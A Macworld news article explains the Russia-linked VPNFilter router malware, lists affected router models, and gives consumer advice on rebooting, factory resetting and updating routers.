That Rus­sia router mal­ware threat might be worse than feared

In some cases, a full fac­tory re­set may be re­quired.

Macworld (USA) - - Contents - BY BRAD CHACOS AND MICHAEL SI­MON

Your gate­way to the In­ter­net may be the por­tal that for­eign hack­ers are us­ing to snatch your data. The FBI re­cently is­sued a se­cu­rity no­tice ( go.mac­world.com/ cyba) warn­ing that all home and small of­fice routers should be re­booted af­ter Cisco’s Ta­los group ( go.mac­world.com/cstl) dis­cov­ered so­phis­ti­cated Rus­sian-linked “Vp­n­fil­ter” mal­ware in­fect­ing at least 500,000 net­work­ing de­vices.

Here’s what you need to know about

Vp­n­fil­ter and the FBI’S guid­ance to re­boot your router—which might not even safe­guard against the mal­ware com­pletely.

WHAT’S THE THREAT?

Since all your In­ter­net and lo­cal net­work traf­fic flows through your router, it can be pretty se­vere.

“Vp­n­fil­ter is able to ren­der small of­fice and home of­fice routers in­op­er­a­ble,” the FBI warns. “The mal­ware can po­ten­tially also col­lect in­for­ma­tion pass­ing through the router.”

Routers are es­pe­cially ripe tar­gets for hack­ers be­cause they usu­ally con­nect di­rectly to the In­ter­net and aren’t of­ten pro­tected by your PC’S an­tivirus or other se­cu­rity so­lu­tions. Most peo­ple don’t in­stall router firmware up­dates, either, which can leave vul­ner­a­bil­i­ties ex­posed. Vp­n­fil­ter also en­crypts its net­work traf­fic, which can make de­tec­tion even more dif­fi­cult, the FBI says.

Most re­cent in­fec­tions ob­served by Cisco oc­curred in Ukraine, how­ever, and the Jus­tice De­part­ment ( go.mac­world.com/ jsdp) con­nected Vp­n­fil­ter to “So­facy Group,” an es­pi­onage group as­so­ci­ated with Rus­sia.

THAT DOESN’T SOUND SO BAD.

It gets worse. In a fol­low-up post, Cisco’s Ta­los ( go.mac­world.com/xedp) has dis­cov­ered “a new stage 3 mod­ule that in­jects ma­li­cious con­tent into web traf­fic as it passes through a net­work de­vice.” Bet­ter known as a “man-in-the-mid­dle” at­tack, this means that bad ac­tors can use this vul­ner­a­bil­ity to in­ter­cept net­work traf­fic and in­ject ma­li­cious code without the user’s knowl­edge. That means a hacker can ma­nip­u­late what you see on your screen while still per­form­ing ma­li­cious tasks on your screen. As Craig Wil­liams, a se­nior tech­nol­ogy leader and global outreach man­ager at Ta­los, ex­plained to Ars Technica, “They can mod­ify your bank ac­count bal­ance so that it looks nor­mal while at the same time they’re si­phon­ing off money and po­ten­tially PGP keys and things like that. They can ma­nip­u­late ev­ery­thing go­ing in and out of the de­vice.” That’s a much greater threat than ini­tially feared.

WHAT ROUTERS ARE AF­FECTED?

The FBI’S se­cu­rity no­tice sug­gests that all router own­ers re­boot their de­vices. Ad­di­tion­ally, Cisco’s Ta­los group says that “Due to the po­ten­tial for de­struc­tive ac­tion by the threat ac­tor, we rec­om­mend out of an abun­dance of cau­tion that these ac­tions be taken for all SOHO or NAS de­vices, whether or not they are known to be af­fected by this threat.”

So you should re­boot your router no mat­ter what. That said, Sy­man­tec ( go.

mac­world.com/nwrm) re­leased the fol­low­ing list of routers and NAS de­vices known to be sus­cep­ti­ble to Vp­n­fil­ter. Some are pop­u­lar af­ford­able mod­els, and one (the Net­gear WNR1000) is pro­vided to Com­cast cus­tomers in some cir­cum­stances.

> Linksys E1200

> Linksys E2500

> Linksys WRVS4400N

> Mikrotik Routeros for Cloud Core

Routers: Ver­sions 1016, 1036, and 1072

> Net­gear DGN2200

> Net­gear R6400

> Net­gear R7000

> Net­gear R8000

> Net­gear WNR1000

> Net­gear WNR2000

> QNAP TS251

> QNAP TS439 Pro

> Other QNAP NAS de­vices run­ning

QTS soft­ware

> Tp-link R600VPN

Just this week, how­ever, Cisco is­sued a warn­ing that the threat goes be­yond even those mod­els, and in­cludes a wider swath of routers man­u­fac­tured by ASUS, D-link, Huawei, Ubiq­uiti, UPVEL, and ZTE. So once again: The FBI and Cisco’s crack se­cu­rity squad sug­gest that we all re­boot our routers, even if it’s not on this list.

HOW DO I RE­BOOT MY ROUTER?

Re­boot­ing your router erad­i­cates what Cisco calls the “Stage 2” and “Stage 3” el­e­ments of Vp­n­fil­ter—the de­struc­tive part of the mal­ware.

Re­boot­ing your router is easy. Sim­ply un­plug it from the wall, wait 30 sec­onds, and plug it back in. Done!

IS THERE ANY­THING ELSE I SHOULD DO TO STAY SAFE?

Yes. Let’s start with the easy steps.

The FBI and some hard­ware mak­ers rec­om­mend dis­abling re­mote man­age­ment fea­tures on your router, which are off by de­fault in most cases. You’ll also want to change your router’s de­fault lo­gin cre­den­tials, swap­ping in a strong, unique pass­word—not one you use for any other web­sites or ser­vices. Pc­world’s guide to the best pass­word man­agers ( go.mac­world.com/pssm) can help if you aren’t us­ing one al­ready.

Even though routers aren’t typ­i­cally pro­tected by your PC’S an­tivirus, Sy­man­tec says its soft­ware can de­tect Vp­n­fil­ter. Run­ning se­cu­rity soft­ware on your com­puter helps it stay as safe as pos­si­ble, and this episode serves as a re­minder that you should be do­ing it. Pc­world’s guide to the best an­tivirus for Win­dows PCS ( go. mac­world.com/avpc) can help you pick the best for your sit­u­a­tion.

Now for the bad news.

SHOULD I FAC­TORY RE­SET MY ROUTER?

What makes Vp­n­fil­ter so so­phis­ti­cated is its “Stage 1” el­e­ment, which can per­sist even through a re­boot and then con­tact the hack­ers to re­in­stall the other stages of the mal­ware. The Jus­tice De­part­ment seized a do­main that the mal­ware used to in­stall Vp­n­fil­ter’s later stages on in­fected PCS, but that doesn’t mean the threat is elim­i­nated as it also uses other meth­ods to con­nect with the hack­ers.

The only way to fully re­move the mal­ware is by per­form­ing a fac­tory re­set of your router and up­dat­ing it to the lat­est firmware re­vi­sion avail­able, which will pro­tect against known vul­ner­a­bil­i­ties. It’s a com­pli­cated pro­ce­dure that will re­quire you to re­con­fig­ure your net­work set­tings, but we’d rec­om­mend do­ing it if your router is on the list of de­vices known to be vul­ner­a­ble to Vp­n­fil­ter.

The ex­act pro­ce­dure for re­set­ting a router can vary, though it usu­ally in­volves press­ing a pin or the end of a pa­per­clip into a small pin­hole but­ton on the hard­ware, fol­lowed by con­nect­ing the de­vice to a PC via eth­er­net to com­plete the ini­tial con­fig­u­ra­tion. Linksys ( go.mac­world.com/lnmu),

Mikrotik ( go.mac­world.com/mtmw),

Net­gear ( go.mac­world.com/ngmw),

QNAP ( go.mac­world.com/qnmw) and Tp-link ( go.mac­world.com/tpmw) have all posted in­struc­tions ex­plain­ing how to fac­tory re­set your routers and oth­er­wise pro­tect against Vp­n­fil­ter.

Per­form­ing a lit­tle prep work be­fore­hand can make the ex­pe­ri­ence less of a has­sle. Al­though you’ll want to change your router’s de­fault ad­min­is­tra­tive user­name and pass­word, jot down your ex­ist­ing net­work name(s) and pass­word be­fore you re­set your hard­ware. When you cre­ate a new net­work af­ter fac­tory re­set­ting your router, it’s safe to use the same Wi-fi name and pass­words as be­fore. Do­ing so will let all your de­vices re­con­nect eas­ily. ■

Newspapers in English

Newspapers from USA

© PressReader. All rights reserved.